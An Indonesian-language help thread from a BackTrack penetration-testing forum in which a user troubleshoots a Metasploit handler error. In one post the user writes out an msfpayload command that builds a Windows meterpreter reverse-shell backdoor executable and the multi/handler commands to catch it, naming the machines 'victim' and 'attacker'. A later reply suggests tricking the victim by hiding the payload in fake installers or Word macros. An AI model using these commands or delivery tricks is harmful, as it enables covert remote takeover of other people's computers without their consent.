Indonesian Back|Track Team
[-] Handler failed to bind 192.168.0.2 - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html)
+----- Forum: Backtrack 5 Tanya Jawab (https://www.indonesianbacktrack.or.id/forum/forum-86.html)
+----- Thread: [-] Handler failed to bind 192.168.0.2 (/thread-485.html)



[-] Handler failed to bind 192.168.0.2 - cinta1malam - 07-25-2011

mungkin ada yang bisa bantu ane !!!! kenapa ya keluar perintah [-] Handler failed to bind to 192.168.0.2 saat ane eksekusi perintah exploit -j , mungkin ada yang bisa bantu ane !!!! makasih sebelumnya :pc:


RE: [-] Handler failed to bind 192.168.0.2 - 9oBl4ck - 07-26-2011

itu kan payload .. btw make exploit apa ? terus spesifikasi LHOST dll... ?
yang lengkap bro Big Grin


RE: [-] Handler failed to bind 192.168.0.2 - cinta1malam - 07-26-2011

[192.168.0.1]------>[192.168.0.2]
komputer korban komputer penyerang

[buat backdoornya dah berhasil om]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=1337 R | msfencode -t exe x > coba.exe

[ane gunakan exploit msfconsole]
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.2
set LPORT 1337
exploit-------> keluar error "[-]Handler failed to bind 192.168.0.2"

ane mau tanya bro, apakah harus ada aplikasi untuk calon korban yang harus ditanam di komputernya terlebih dahulu, spt netcut ? makasih..


RE: [-] Handler failed to bind 192.168.0.2 - iKONspirasi - 07-26-2011

Quote:[buat backdoornya dah berhasil om]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=1337 R | msfencode -t exe x > coba.exe

file coba.exe udah dijalanin di komputer korban belom bro?



RE: [-] Handler failed to bind 192.168.0.2 - cinta1malam - 07-26-2011

(07-26-2011, 11:23 AM)konspirasi Wrote:
Quote:[buat backdoornya dah berhasil om]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=1337 R | msfencode -t exe x > coba.exe

file coba.exe udah dijalanin di komputer korban belom bro?

oo gitu ya bro, berarti harus ada aksi dari komputer korban !!! makasih ane coba dulu !!!


RE: [-] Handler failed to bind 192.168.0.2 - zee eichel - 07-27-2011

di manipulasi aja bro .. bisa kan di buat file2 tipuan ... misalnya dengan membuat file instalasi tertentu atau di gandengkan dengan file2 instalasi or macro dalam msword..masih banyak kok bro Tongue


RE: [-] Handler failed to bind 192.168.0.2 - cinta1malam - 07-27-2011

oke makasih ya bro !!!!